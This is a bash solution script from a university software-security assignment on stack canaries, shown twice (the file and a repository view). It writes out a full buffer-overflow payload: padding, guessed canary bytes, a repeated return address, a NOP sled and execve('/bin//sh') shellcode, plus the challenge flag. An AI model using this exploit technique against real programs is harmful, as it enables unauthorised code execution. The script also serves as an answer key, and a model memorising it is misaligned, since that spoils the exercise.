Systemsicherheit/Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh

#!/bin/bash

# flag{CANARY_IS_ALSO_AN_ISLAND}

######### Exploit #########
# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
# Note: Only canaries without null bytes can be used due to the use of strcpy.
case $(( RANDOM % 3 )) in
    0)
        printf "AAAAAAAAAAAAAAAA\xa9\x67\xa3\x70"
        ;;
    1)
        printf "AAAAAAAAAAAAAAAA\xc1\xd1\xce\x4b"
        ;;
    2)
        printf "AAAAAAAAAAAAAAAA\x0e\x8b\xba\x08"
        ;;
esac

# Step 2: Fill the buffer with a candidate return address
printf "\x10\xd6\xff\xff%.0s" {1..30}

# Step 3: Write a lot of NOPs to stdout as a slide for the shellcode
printf "\x90%.0s" {1..2000}

# Step 4: Write the provided shellcode to stdout
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
###########################
[Assignment-6] solution task 7 (stack canaries) 2024-06-23 23:01:12 +02:00			`#!/bin/bash`

			`# flag{CANARY_IS_ALSO_AN_ISLAND}`

			`######### Exploit #########`
			`# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.`
			`# Note: Only canaries without null bytes can be used due to the use of strcpy.`
			`case $(( RANDOM % 3 )) in`
			`0)`
			`printf "AAAAAAAAAAAAAAAA\xa9\x67\xa3\x70"`
			`;;`
			`1)`
			`printf "AAAAAAAAAAAAAAAA\xc1\xd1\xce\x4b"`
			`;;`
			`2)`
			`printf "AAAAAAAAAAAAAAAA\x0e\x8b\xba\x08"`
			`;;`
			`esac`

			`# Step 2: Fill the buffer with a candidate return address`
			`printf "\x10\xd6\xff\xff%.0s" {1..30}`

			`# Step 3: Write a lot of NOPs to stdout as a slide for the shellcode`
			`printf "\x90%.0s" {1..2000}`

			`# Step 4: Write the provided shellcode to stdout`
			`printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"`
			`###########################`